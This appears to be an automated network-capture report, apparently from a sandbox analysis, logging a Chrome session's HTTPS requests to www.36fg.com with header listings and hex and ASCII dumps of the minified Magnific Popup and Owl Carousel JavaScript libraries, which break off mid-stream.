                                                        Data Ascii: "MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.classNam
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 3d 63 2e 69 74 65 6d 73 2e 74 6f 41 72 72 61 79 28 29 2c 62 2e 69 6e 64 65 78 3d 30 3b 76 61 72 20 67 2c 68 3d 63 2e 69 74 65 6d 73 3b 66 6f 72 28 65 3d 30 3b 65 3c 68 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 69 66 28 67 3d 68 5b 65 5d 2c 67 2e 70 61 72 73 65 64 26 26 28 67 3d 67 2e 65 6c 5b 30 5d 29 2c 67 3d 3d 3d 63 2e 65 6c 5b 30 5d 29 7b 62 2e 69 6e 64 65 78 3d 65 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 62 2e 69 74 65 6d 73 3d 61 2e 69 73 41 72 72 61 79 28 63 2e 69 74 65 6d 73 29 3f 63 2e 69 74 65 6d 73 3a 5b 63 2e 69 74 65 6d 73 5d 2c 62 2e 69 6e 64 65 78 3d 63 2e 69 6e 64 65 78 7c 7c 30 3b 69 66 28 62 2e 69 73 4f 70 65 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 62 2e 75 70 64 61 74 65 49 74 65 6d 48 54 4d 4c 28 29 3b 62 2e 74 79 70 65 73 3d 5b 5d 2c 66 3d
                                                        Data Ascii: =c.items.toArray(),b.index=0;var g,h=c.items;for(e=0;e<h.length;e++)if(g=h[e],g.parsed&&(g=g.el[0]),g===c.el[0]){b.index=e;break}}else b.items=a.isArray(c.items)?c.items:[c.items],b.index=c.index||0;if(b.isOpen)return void b.updateItemHTML();b.types=[],f=
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 6c 6f 77 59 3a 62 2e 73 74 2e 6f 76 65 72 66 6c 6f 77 59 7d 29 3a 62 2e 77 72 61 70 2e 63 73 73 28 7b 74 6f 70 3a 76 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 7d 29 2c 28 62 2e 73 74 2e 66 69 78 65 64 42 67 50 6f 73 3d 3d 3d 21 31 7c 7c 22 61 75 74 6f 22 3d 3d 3d 62 2e 73 74 2e 66 69 78 65 64 42 67 50 6f 73 26 26 21 62 2e 66 69 78 65 64 43 6f 6e 74 65 6e 74 50 6f 73 29 26 26 62 2e 62 67 4f 76 65 72 6c 61 79 2e 63 73 73 28 7b 68 65 69 67 68 74 3a 64 2e 68 65 69 67 68 74 28 29 2c 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 7d 29 2c 62 2e 73 74 2e 65 6e 61 62 6c 65 45 73 63 61 70 65 4b 65 79 26 26 64 2e 6f 6e 28 22 6b 65 79 75 70 22 2b 70 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 32 37 3d 3d 3d
                                                        Data Ascii: lowY:b.st.overflowY}):b.wrap.css({top:v.scrollTop(),position:"absolute"}),(b.st.fixedBgPos===!1||"auto"===b.st.fixedBgPos&&!b.fixedContentPos)&&b.bgOverlay.css({height:d.height(),position:"absolute"}),b.st.enableEscapeKey&&d.on("keyup"+p,function(a){27===
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 74 50 6f 73 29 7b 76 61 72 20 65 3d 7b 6d 61 72 67 69 6e 52 69 67 68 74 3a 22 22 7d 3b 62 2e 69 73 49 45 37 3f 61 28 22 62 6f 64 79 2c 20 68 74 6d 6c 22 29 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22 2c 22 22 29 3a 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 22 2c 61 28 22 68 74 6d 6c 22 29 2e 63 73 73 28 65 29 7d 64 2e 6f 66 66 28 22 6b 65 79 75 70 22 2b 70 2b 22 20 66 6f 63 75 73 69 6e 22 2b 70 29 2c 62 2e 65 76 2e 6f 66 66 28 70 29 2c 62 2e 77 72 61 70 2e 61 74 74 72 28 22 63 6c 61 73 73 22 2c 22 6d 66 70 2d 77 72 61 70 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 73 74 79 6c 65 22 29 2c 62 2e 62 67 4f 76 65 72 6c 61 79 2e 61 74 74 72 28 22 63 6c 61 73 73 22 2c 22 6d 66 70 2d 62 67 22 29 2c 62 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 74 74 72 28 22 63 6c 61 73 73
                                                        Data Ascii: tPos){var e={marginRight:""};b.isIE7?a("body, html").css("overflow",""):e.overflow="",a("html").css(e)}d.off("keyup"+p+" focusin"+p),b.ev.off(p),b.wrap.attr("class","mfp-wrap").removeAttr("style"),b.bgOverlay.attr("class","mfp-bg"),b.container.attr("class
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 6e 64 43 6f 6e 74 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 62 2e 63 6f 6e 74 65 6e 74 3d 61 2c 61 3f 62 2e 73 74 2e 73 68 6f 77 43 6c 6f 73 65 42 74 6e 26 26 62 2e 73 74 2e 63 6c 6f 73 65 42 74 6e 49 6e 73 69 64 65 26 26 62 2e 63 75 72 72 54 65 6d 70 6c 61 74 65 5b 63 5d 3d 3d 3d 21 30 3f 62 2e 63 6f 6e 74 65 6e 74 2e 66 69 6e 64 28 22 2e 6d 66 70 2d 63 6c 6f 73 65 22 29 2e 6c 65 6e 67 74 68 7c 7c 62 2e 63 6f 6e 74 65 6e 74 2e 61 70 70 65 6e 64 28 7a 28 29 29 3a 62 2e 63 6f 6e 74 65 6e 74 3d 61 3a 62 2e 63 6f 6e 74 65 6e 74 3d 22 22 2c 79 28 6b 29 2c 62 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 64 64 43 6c 61 73 73 28 22 6d 66 70 2d 22 2b 63 2b 22 2d 68 6f 6c 64 65 72 22 29 2c 62 2e 63 6f 6e 74 65 6e 74 43 6f 6e 74 61 69 6e 65 72 2e 61 70 70 65 6e
                                                        Data Ascii: ndContent:function(a,c){b.content=a,a?b.st.showCloseBtn&&b.st.closeBtnInside&&b.currTemplate[c]===!0?b.content.find(".mfp-close").length||b.content.append(z()):b.content=a:b.content="",y(k),b.container.addClass("mfp-"+c+"-holder"),b.contentContainer.appen
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6d 66 70 2d 73 2d 22 2b 63 29 2c 64 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 61 7c 7c 28 64 3d 62 2e 73 74 2e 74 4c 6f 61 64 69 6e 67 29 3b 76 61 72 20 65 3d 7b 73 74 61 74 75 73 3a 61 2c 74 65 78 74 3a 64 7d 3b 79 28 22 55 70 64 61 74 65 53 74 61 74 75 73 22 2c 65 29 2c 61 3d 65 2e 73 74 61 74 75 73 2c 64 3d 65 2e 74 65 78 74 2c 62 2e 70 72 65 6c 6f 61 64 65 72 2e 68 74 6d 6c 28 64 29 2c 62 2e 70 72 65 6c 6f 61 64 65 72 2e 66 69 6e 64 28 22 61 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 7d 29 2c 62 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 64 64 43 6c 61 73 73 28 22 6d 66 70 2d 73 2d 22 2b 61 29 2c 63
                                                        Data Ascii: .removeClass("mfp-s-"+c),d||"loading"!==a||(d=b.st.tLoading);var e={status:a,text:d};y("UpdateStatus",e),a=e.status,d=e.text,b.preloader.html(d),b.preloader.find("a").on("click",function(a){a.stopImmediatePropagation()}),b.container.addClass("mfp-s-"+a),c
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 22 63 6c 61 73 73 22 2c 66 2e 61 74 74 72 28 22 63 6c 61 73 73 22 29 29 29 3a 66 2e 61 74 74 72 28 65 5b 31 5d 2c 64 29 7d 7d 65 6c 73 65 20 62 2e 66 69 6e 64 28 70 2b 22 2d 22 2b 63 29 2e 68 74 6d 6c 28 64 29 7d 29 7d 2c 5f 67 65 74 53 63 72 6f 6c 6c 62 61 72 53 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 62 2e 73 63 72 6f 6c 6c 62 61 72 53 69 7a 65 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 77 69 64 74 68 3a 20 39 39 70 78 3b 20 68 65 69 67 68 74 3a 20 39 39 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 73 63 72 6f 6c 6c 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20
                                                        Data Ascii: "class",f.attr("class"))):f.attr(e[1],d)}}else b.find(p+"-"+c).html(d)})},_getScrollbarSize:function(){if(void 0===b.scrollbarSize){var a=document.createElement("div");a.style.cssText="width: 99px; height: 99px; overflow: scroll; position: absolute; top:
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 2e 69 74 65 6d 73 3f 65 3d 66 2e 69 74 65 6d 73 5b 67 5d 3a 28 65 3d 64 2c 66 2e 64 65 6c 65 67 61 74 65 26 26 28 65 3d 65 2e 66 69 6e 64 28 66 2e 64 65 6c 65 67 61 74 65 29 29 2c 65 3d 65 2e 65 71 28 67 29 29 2c 62 2e 5f 6f 70 65 6e 43 6c 69 63 6b 28 7b 6d 66 70 45 6c 3a 65 7d 2c 64 2c 66 29 7d 65 6c 73 65 20 62 2e 69 73 4f 70 65 6e 26 26 62 5b 63 5d 2e 61 70 70 6c 79 28 62 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 3b 65 6c 73 65 20 63 3d 61 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 63 29 2c 75 3f 64 2e 64 61 74 61 28 22 6d 61 67 6e 69 66 69 63 50 6f 70 75 70 22 2c 63 29 3a 64 5b 30 5d 2e 6d 61 67 6e 69 66 69 63 50 6f 70 75 70 3d 63 2c 62 2e 61 64 64 47 72 6f 75 70 28 64 2c
                                                        Data Ascii: .items?e=f.items[g]:(e=d,f.delegate&&(e=e.find(f.delegate)),e=e.eq(g)),b._openClick({mfpEl:e},d,f)}else b.isOpen&&b[c].apply(b,Array.prototype.slice.call(arguments,1));else c=a.extend(!0,{},c),u?d.data("magnificPopup",c):d[0].magnificPopup=c,b.addGroup(d,
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 68 72 3a 66 7d 3b 79 28 22 50 61 72 73 65 41 6a 61 78 22 2c 67 29 2c 62 2e 61 70 70 65 6e 64 43 6f 6e 74 65 6e 74 28 61 28 67 2e 64 61 74 61 29 2c 49 29 2c 63 2e 66 69 6e 69 73 68 65 64 3d 21 30 2c 4a 28 29 2c 62 2e 5f 73 65 74 46 6f 63 75 73 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 77 72 61 70 2e 61 64 64 43 6c 61 73 73 28 71 29 7d 2c 31 36 29 2c 62 2e 75 70 64 61 74 65 53 74 61 74 75 73 28 22 72 65 61 64 79 22 29 2c 79 28 22 41 6a 61 78 43 6f 6e 74 65 6e 74 41 64 64 65 64 22 29 7d 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 4a 28 29 2c 63 2e 66 69 6e 69 73 68 65 64 3d 63 2e 6c 6f 61 64 45 72 72 6f 72 3d 21 30 2c 62 2e 75 70 64 61 74 65 53 74 61 74 75 73 28 22 65 72 72 6f 72 22 2c 62 2e 73 74 2e 61 6a 61
                                                        Data Ascii: hr:f};y("ParseAjax",g),b.appendContent(a(g.data),I),c.finished=!0,J(),b._setFocus(),setTimeout(function(){b.wrap.addClass(q)},16),b.updateStatus("ready"),y("AjaxContentAdded")},error:function(){J(),c.finished=c.loadError=!0,b.updateStatus("error",b.st.aja


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.549763104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC612OUTGET /static/js/owl.carousel.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:56 UTC997INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:56 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7a-a70e"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28897
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w8oYSaucQ43gOHld05RiF%2FWKYsJSAtmg8ib7d1bWJhMrxXhqoKBahYnXzI0KJ37msyNZyYoh8sHpxC8HeQG6wdsb8nqADT0mFJXCmlR0j%2BKXXht6vs39xErG1xCLupk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4a909ae7ce7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1889&rtt_var=717&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1184&delivery_rate=1518460&cwnd=198&unsent_bytes=0&cid=6eb733c09dc9dc3d&ts=139&x=0"
                                                        2025-03-15 00:17:56 UTC372INData Raw: 37 63 39 32 0d 0a 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 32 2e 31 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 37 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 20 28 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 62 2c 63 29 7b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2e 44 65 66 61 75 6c 74 73 2c 63 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 61 28 62 29 2c 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 5f 70 6c 75 67 69 6e 73 3d 7b 7d 2c 74 68 69 73 2e 5f 73 75 70 72 65 73
                                                        Data Ascii: 7c92/** * Owl Carousel v2.2.1 * Copyright 2013-2017 David Deutsch * Licensed under () */!function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supres
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 68 69 73 2e 5f 63 6c 6f 6e 65 73 3d 5b 5d 2c 74 68 69 73 2e 5f 6d 65 72 67 65 72 73 3d 5b 5d 2c 74 68 69 73 2e 5f 77 69 64 74 68 73 3d 5b 5d 2c 74 68 69 73 2e 5f 69 6e 76 61 6c 69 64 61 74 65 64 3d 7b 7d 2c 74 68 69 73 2e 5f 70 69 70 65 3d 5b 5d 2c 74 68 69 73 2e 5f 64 72 61 67 3d 7b 74 69 6d 65 3a 6e 75 6c 6c 2c 74 61 72 67 65 74 3a 6e 75 6c 6c 2c 70 6f 69 6e 74 65 72 3a 6e 75 6c 6c 2c 73 74 61 67 65 3a 7b 73 74 61 72 74 3a 6e 75 6c 6c 2c 63 75 72 72 65 6e 74 3a 6e 75 6c 6c 7d 2c 64 69 72 65 63 74 69 6f 6e 3a 6e 75 6c 6c 7d 2c 74 68 69 73 2e 5f 73 74 61 74 65 73 3d 7b 63 75 72 72 65 6e 74 3a 7b 7d 2c 74 61 67 73 3a 7b 69 6e 69 74 69 61 6c 69 7a 69 6e 67 3a 5b 22 62 75 73 79 22 5d 2c 61 6e 69 6d 61 74 69 6e 67 3a 5b 22 62 75 73 79 22 5d 2c 64 72 61 67 67
                                                        Data Ascii: his._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragg
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 7d 2c 65 2e 57 6f 72 6b 65 72 73 3d 5b 7b 66 69 6c 74 65 72 3a 5b 22 77 69 64 74 68 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 77 69 64 74 68 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 77 69 64 74 68 28 29 7d 7d 2c 7b 66 69 6c 74 65 72 3a 5b 22 77 69 64 74 68 22 2c 22 69 74 65 6d 73 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 63 75 72 72 65 6e 74 3d 74 68 69 73 2e 5f 69 74 65 6d 73 26 26 74 68 69 73 2e 5f 69 74 65 6d 73 5b 74 68 69 73 2e 72 65 6c 61 74 69 76 65 28 74 68 69 73 2e 5f 63 75 72 72 65 6e 74 29 5d 7d 7d 2c 7b 66 69 6c 74 65 72 3a 5b 22 69 74 65 6d 73 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28
                                                        Data Ascii: },e.Workers=[{filter:["width","settings"],run:function(){this._width=this.$element.width()}},{filter:["width","items","settings"],run:function(a){a.current=this._items&&this._items[this.relative(this._current)]}},{filter:["items","settings"],run:function(
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 65 70 65 6e 64 54 6f 28 74 68 69 73 2e 24 73 74 61 67 65 29 7d 7d 2c 7b 66 69 6c 74 65 72 3a 5b 22 77 69 64 74 68 22 2c 22 69 74 65 6d 73 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 72 74 6c 3f 31 3a 2d 31 2c 62 3d 74 68 69 73 2e 5f 63 6c 6f 6e 65 73 2e 6c 65 6e 67 74 68 2b 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2c 63 3d 2d 31 2c 64 3d 30 2c 65 3d 30 2c 66 3d 5b 5d 3b 2b 2b 63 3c 62 3b 29 64 3d 66 5b 63 2d 31 5d 7c 7c 30 2c 65 3d 74 68 69 73 2e 5f 77 69 64 74 68 73 5b 74 68 69 73 2e 72 65 6c 61 74 69 76 65 28 63 29 5d 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6d 61 72 67 69 6e 2c 66 2e 70 75 73 68 28 64 2b 65 2a 61 29 3b 74
                                                        Data Ascii: ependTo(this.$stage)}},{filter:["width","items","settings"],run:function(){for(var a=this.settings.rtl?1:-1,b=this._clones.length+this._items.length,c=-1,d=0,e=0,f=[];++c<b;)d=f[c-1]||0,e=this._widths[this.relative(c)]+this.settings.margin,f.push(d+e*a);t
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 63 6f 6f 72 64 69 6e 61 74 65 73 2e 6c 65 6e 67 74 68 3b 63 3c 64 3b 63 2b 2b 29 61 3d 74 68 69 73 2e 5f 63 6f 6f 72 64 69 6e 61 74 65 73 5b 63 2d 31 5d 7c 7c 30 2c 62 3d 4d 61 74 68 2e 61 62 73 28 74 68 69 73 2e 5f 63 6f 6f 72 64 69 6e 61 74 65 73 5b 63 5d 29 2b 66 2a 65 2c 28 74 68 69 73 2e 6f 70 28 61 2c 22 3c 3d 22 2c 67 29 26 26 74 68 69 73 2e 6f 70 28 61 2c 22 3e 22 2c 68 29 7c 7c 74 68 69 73 2e 6f 70 28 62 2c 22 3c 22 2c 67 29 26 26 74 68 69 73 2e 6f 70 28 62 2c 22 3e 22 2c 68 29 29 26 26 69 2e 70 75 73 68 28 63 29 3b 74 68 69 73 2e 24 73 74 61 67 65 2e 63 68 69 6c 64 72 65 6e 28 22 2e 61 63 74 69 76 65 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 74 68 69 73 2e 24 73 74 61 67 65 2e 63 68 69 6c 64 72 65 6e 28 22 3a 65
                                                        Data Ascii: coordinates.length;c<d;c++)a=this._coordinates[c-1]||0,b=Math.abs(this._coordinates[c])+f*e,(this.op(a,"<=",g)&&this.op(a,">",h)||this.op(b,"<",g)&&this.op(b,">",h))&&i.push(c);this.$stage.children(".active").removeClass("active"),this.$stage.children(":e
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 72 69 67 67 65 72 28 22 69 6e 69 74 69 61 6c 69 7a 65 64 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 75 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 76 69 65 77 70 6f 72 74 28 29 2c 63 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 70 6f 6e 73 69 76 65 2c 64 3d 2d 31 2c 65 3d 6e 75 6c 6c 3b 63 3f 28 61 2e 65 61 63 68 28 63 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3c 3d 62 26 26 61 3e 64 26 26 28 64 3d 4e 75 6d 62 65 72 28 61 29 29 7d 29 2c 65 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 63 5b 64 5d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 74 61 67 65 50 61 64 64 69 6e 67 26 26 28 65 2e 73 74 61 67 65 50 61 64 64 69 6e 67 3d 65 2e 73 74 61 67 65 50
                                                        Data Ascii: rigger("initialized")},e.prototype.setup=function(){var b=this.viewport(),c=this.options.responsive,d=-1,e=null;c?(a.each(c,function(a){a<=b&&a>d&&(d=Number(a))}),e=a.extend({},this.options,c[d]),"function"==typeof e.stagePadding&&(e.stagePadding=e.stageP
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 61 73 65 20 65 2e 57 69 64 74 68 2e 4f 75 74 65 72 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 77 69 64 74 68 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 77 69 64 74 68 2d 32 2a 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 73 74 61 67 65 50 61 64 64 69 6e 67 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6d 61 72 67 69 6e 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 74 65 72 28 22 72 65 66 72 65 73 68 69 6e 67 22 29 2c 74 68 69 73 2e 74 72 69 67 67 65 72 28 22 72 65 66 72 65 73 68 22 29 2c 74 68 69 73 2e 73 65 74 75 70 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 4c 6f 67 69 63 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c 61 73 73 28 74 68 69
                                                        Data Ascii: ase e.Width.Outer:return this._width;default:return this._width-2*this.settings.stagePadding+this.settings.margin}},e.prototype.refresh=function(){this.enter("refreshing"),this.trigger("refresh"),this.setup(),this.optionsLogic(),this.$element.addClass(thi
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 72 61 67 26 26 28 74 68 69 73 2e 24 73 74 61 67 65 2e 6f 6e 28 22 74 6f 75 63 68 73 74 61 72 74 2e 6f 77 6c 2e 63 6f 72 65 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6f 6e 44 72 61 67 53 74 61 72 74 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 24 73 74 61 67 65 2e 6f 6e 28 22 74 6f 75 63 68 63 61 6e 63 65 6c 2e 6f 77 6c 2e 63 6f 72 65 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6f 6e 44 72 61 67 45 6e 64 2c 74 68 69 73 29 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 44 72 61 67 53 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 64 3d 6e 75 6c 6c 3b 33 21 3d 3d 62 2e 77 68 69 63 68 26 26 28 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 66 6f 72 6d 3f 28 64 3d 74 68 69 73 2e 24 73 74 61 67 65 2e 63 73 73 28 22 74 72 61 6e 73 66 6f 72 6d
                                                        Data Ascii: rag&&(this.$stage.on("touchstart.owl.core",a.proxy(this.onDragStart,this)),this.$stage.on("touchcancel.owl.core",a.proxy(this.onDragEnd,this)))},e.prototype.onDragStart=function(b){var d=null;3!==b.which&&(a.support.transform?(d=this.$stage.css("transform
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 74 61 67 65 2e 73 74 61 72 74 2c 65 29 3b 74 68 69 73 2e 69 73 28 22 64 72 61 67 67 69 6e 67 22 29 26 26 28 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6c 6f 6f 70 3f 28 62 3d 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 29 2c 63 3d 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 2b 31 29 2d 62 2c 66 2e 78 3d 28 28 66 2e 78 2d 62 29 25 63 2b 63 29 25 63 2b 62 29 3a 28 62 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 72 74 6c 3f 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 29 3a 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 69 6e 69 6d 75 6d
                                                        Data Ascii: tage.start,e);this.is("dragging")&&(a.preventDefault(),this.settings.loop?(b=this.coordinates(this.minimum()),c=this.coordinates(this.maximum()+1)-b,f.x=((f.x-b)%c+c)%c+b):(b=this.settings.rtl?this.coordinates(this.maximum()):this.coordinates(this.minimum
                                                        2025-03-15 00:17:56 UTC1369INData Raw: 26 26 74 68 69 73 2e 6f 70 28 62 2c 22 3e 22 2c 67 5b 61 2b 31 5d 7c 7c 68 2d 66 29 26 26 28 64 3d 22 6c 65 66 74 22 3d 3d 3d 63 3f 61 2b 31 3a 61 29 2c 64 3d 3d 3d 2d 31 7d 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6c 6f 6f 70 7c 7c 28 74 68 69 73 2e 6f 70 28 62 2c 22 3e 22 2c 67 5b 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 5d 29 3f 64 3d 62 3d 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 3a 74 68 69 73 2e 6f 70 28 62 2c 22 3c 22 2c 67 5b 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 5d 29 26 26 28 64 3d 62 3d 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 29 29 2c 64 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 6e 69 6d 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 73 70 65 65 64 28 29 3e 30 3b 74 68 69 73
